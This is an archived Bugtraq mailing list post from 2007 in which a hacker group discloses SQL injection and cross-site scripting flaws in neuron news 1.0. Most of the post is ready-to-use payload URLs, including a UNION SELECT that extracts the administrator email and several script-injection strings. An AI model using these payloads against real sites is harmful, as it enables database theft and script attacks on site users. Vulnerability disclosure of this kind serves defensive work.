Bugtraq mailing list archives

neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)

From: hadihadi_zedehal_2006 () yahoo com
Date: 16 Dec 2007 23:13:42 -0000

           
   ####################################################################
   #                                                                  #
   #  ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::....  #
   #                        (sql injection/xss)                       #           
   ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi & black.shadowes)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vlues:

1.sql injection:
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*
########################
2.xss:
http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script>
########################
g00d l0uck

Current thread:

neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss) hadihadi_zedehal_2006 (Dec 17)